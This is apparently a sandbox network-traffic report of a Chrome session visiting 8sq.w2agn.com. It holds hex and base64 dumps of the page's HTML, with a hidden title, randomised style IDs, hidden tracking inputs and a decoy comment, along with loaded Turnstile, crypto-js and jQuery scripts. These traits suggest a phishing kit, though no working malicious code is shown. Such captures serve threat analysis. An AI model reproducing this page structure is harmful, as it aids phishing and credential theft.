                                                                                                                                                2024-10-28 16:49:15 UTC1369INData Raw: 6b 5a 32 55 73 59 32 68 79 62 32 31 6c 50 54 45 69 50 67 30 4b 49 43 41 67 49 44 78 74 5a 58 52 68 49 47 35 68 62 57 55 39 49 6e 4a 76 59 6d 39 30 63 79 49 67 59 32 39 75 64 47 56 75 64 44 30 69 62 6d 39 70 62 6d 52 6c 65 43 77 67 62 6d 39 6d 62 32 78 73 62 33 63 69 50 67 30 4b 49 43 41 67 49 44 78 74 5a 58 52 68 49 47 35 68 62 57 55 39 49 6e 5a 70 5a 58 64 77 62 33 4a 30 49 69 42 6a 62 32 35 30 5a 57 35 30 50 53 4a 33 61 57 52 30 61 44 31 6b 5a 58 5a 70 59 32 55 74 64 32 6c 6b 64 47 67 73 49 47 6c 75 61 58 52 70 59 57 77 74 63 32 4e 68 62 47 55 39 4d 53 34 77 49 6a 34 4e 43 69 41 67 49 43 41 38 64 47 6c 30 62 47 55 2b 4a 69 4d 34 4d 6a 41 7a 4f 7a 77 76 64 47 6c 30 62 47 55 2b 44 51 6f 67 49 43 41 67 50 48 4e 30 65 57 78 6c 50 67 30 4b 59 6d 39 6b 65 53
                                                                                                                                                Data Ascii: kZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keS
                                                                                                                                                2024-10-28 16:49:15 UTC1369INData Raw: 64 47 56 75 64 43 31 6a 5a 57 35 30 5a 58 4a 37 61 6e 56 7a 64 47 6c 6d 65 53 31 6a 62 32 35 30 5a 57 35 30 4f 6d 4e 6c 62 6e 52 6c 63 69 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 66 51 30 4b 49 30 4a 46 55 55 4e 53 56 58 4a 58 55 46 6b 75 62 58 51 74 4e 58 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 6a 4e 79 5a 57 30 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 33 30 4e 43 69 4e 43 52 56 46 44 55 6c 56 79 56 31 42 5a 49 43 35 74 64 43 30 30 49 48 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 69 41 78 63 6d 56 74 49 57 6c 74 63 47 39 79 64 47 46 75 64 44 74 39 44 51 6f 6a 51 6b 56 52 51 31 4a 56 63 6c 64 51 57 53 41 6a 55 45 64 48 56 47 64 6b 52 47 5a 32 56 79 42 37 59 32 39 73 62 33 49 36 49 43 4d 32 59 7a 63 31 4e 32 51 37 5a 6d 39 75 64 43 31 7a 61 58 70
                                                                                                                                                Data Ascii: dGVudC1jZW50ZXJ7anVzdGlmeS1jb250ZW50OmNlbnRlciFpbXBvcnRhbnQ7fQ0KI0JFUUNSVXJXUFkubXQtNXttYXJnaW4tdG9wOjNyZW0haW1wb3J0YW50O30NCiNCRVFDUlVyV1BZIC5tdC00IHttYXJnaW4tdG9wOiAxcmVtIWltcG9ydGFudDt9DQojQkVRQ1JVcldQWSAjUEdHVGdkRGZ2VyB7Y29sb3I6ICM2Yzc1N2Q7Zm9udC1zaXp
                                                                                                                                                2024-10-28 16:49:15 UTC1369INData Raw: 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 63 47 46 6e 5a 57 78 70 62 6d 73 69 49 47 35 68 62 57 55 39 49 6e 42 68 5a 32 56 73 61 57 35 72 49 69 42 32 59 57 78 31 5a 54 30 69 49 6a 34 4e 43 6a 77 68 4c 53 30 67 50 47 52 70 64 6a 35 55 61 47 55 67 64 32 46 35 49 48 52 76 49 47 64 6c 64 43 42 7a 64 47 46 79 64 47 56 6b 49 47 6c 7a 49 48 52 76 49 48 46 31 61 58 51 67 64 47 46 73 61 32 6c 75 5a 79 42 68 62 6d 51 67 59 6d 56 6e 61 57 34 67 5a 47 39 70 62 6d 63 75 50 43 39 6b 61 58 59 2b 49 43 30 74 50 67 6f 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 59 6d 78 30 5a 47 6c 77 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 61 58 41 69 49 48 5a 68 62 48 56 6c 50 53 4a 56 62 6d 74 75
                                                                                                                                                Data Ascii: HlwZT0iaGlkZGVuIiBpZD0icGFnZWxpbmsiIG5hbWU9InBhZ2VsaW5rIiB2YWx1ZT0iIj4NCjwhLS0gPGRpdj5UaGUgd2F5IHRvIGdldCBzdGFydGVkIGlzIHRvIHF1aXQgdGFsa2luZyBhbmQgYmVnaW4gZG9pbmcuPC9kaXY+IC0tPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBpZD0iYmx0ZGlwIiBuYW1lPSJibHRkaXAiIHZhbHVlPSJVbmtu


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                56192.168.2.1649792104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:49:15 UTC645OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                Referer: https://8sq.w2agn.com/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:49:16 UTC386INHTTP/1.1 302 Found
                                                                                                                                                Date: Mon, 28 Oct 2024 16:49:16 GMT
                                                                                                                                                Content-Length: 0
                                                                                                                                                Connection: close
                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                location: /turnstile/v0/b/e1a56f38220d/api.js
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c6b0b1eca469e-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                57192.168.2.1649794104.17.25.144436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:49:15 UTC647OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                                                                Host: cdnjs.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                Referer: https://8sq.w2agn.com/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:49:16 UTC960INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:49:16 GMT
                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                Cache-Control: public, max-age=30672000
                                                                                                                                                ETag: W/"61182885-40eb"
                                                                                                                                                Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                                                                cf-cdnjs-via: cfworker/kv
                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 104371
                                                                                                                                                Expires: Sat, 18 Oct 2025 16:49:16 GMT
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ynum6MUlQ0uRzLOAO1pu9Z9ae%2BOgutNARQl5h03waW9J9EKNu5R0oouRuBM8RPtIU43XfONcO0PZWtzR%2BY9ihh4%2BpPc%2BzXMHzA9FMBHFDtlnb5nzNXCNwt2AHFLfKMdLSo1ox7Rq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Strict-Transport-Security: max-age=15780000
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c6b0b1f306bcb-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:49:16 UTC409INData Raw: 37 62 66 31 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                                                                Data Ascii: 7bf1!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                                                                2024-10-28 16:49:16 UTC1369INData Raw: 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72
                                                                                                                                                Data Ascii: of globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.cr
                                                                                                                                                2024-10-28 16:49:16 UTC1369INData Raw: 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65
                                                                                                                                                Data Ascii: .call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomByte
                                                                                                                                                2024-10-28 16:49:16 UTC1369INData Raw: 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c
                                                                                                                                                Data Ascii: ypeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<
                                                                                                                                                2024-10-28 16:49:16 UTC1369INData Raw: 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e
                                                                                                                                                Data Ascii: (var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>
                                                                                                                                                2024-10-28 16:49:16 UTC1369INData Raw: 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b
                                                                                                                                                Data Ascii: ;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[
                                                                                                                                                2024-10-28 16:49:16 UTC1369INData Raw: 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a
                                                                                                                                                Data Ascii: er,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:
                                                                                                                                                2024-10-28 16:49:16 UTC1369INData Raw: 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f
                                                                                                                                                Data Ascii: charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNO
                                                                                                                                                2024-10-28 16:49:16 UTC1369INData Raw: 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68
                                                                                                                                                Data Ascii: (a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=th
                                                                                                                                                2024-10-28 16:49:16 UTC1369INData Raw: 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c
                                                                                                                                                Data Ascii: ]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                58192.168.2.1649793151.101.66.1374436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:49:15 UTC619OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                Host: code.jquery.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                Referer: https://8sq.w2agn.com/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:49:16 UTC610INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 89501
                                                                                                                                                Server: nginx
                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                ETag: "28feccc0-15d9d"
                                                                                                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Age: 1151017
                                                                                                                                                Date: Mon, 28 Oct 2024 16:49:16 GMT
                                                                                                                                                X-Served-By: cache-lga21931-LGA, cache-dfw-kdal2120077-DFW
                                                                                                                                                X-Cache: HIT, HIT
                                                                                                                                                X-Cache-Hits: 2, 0
                                                                                                                                                X-Timer: S1730134156.014979,VS0,VE1
                                                                                                                                                Vary: Accept-Encoding
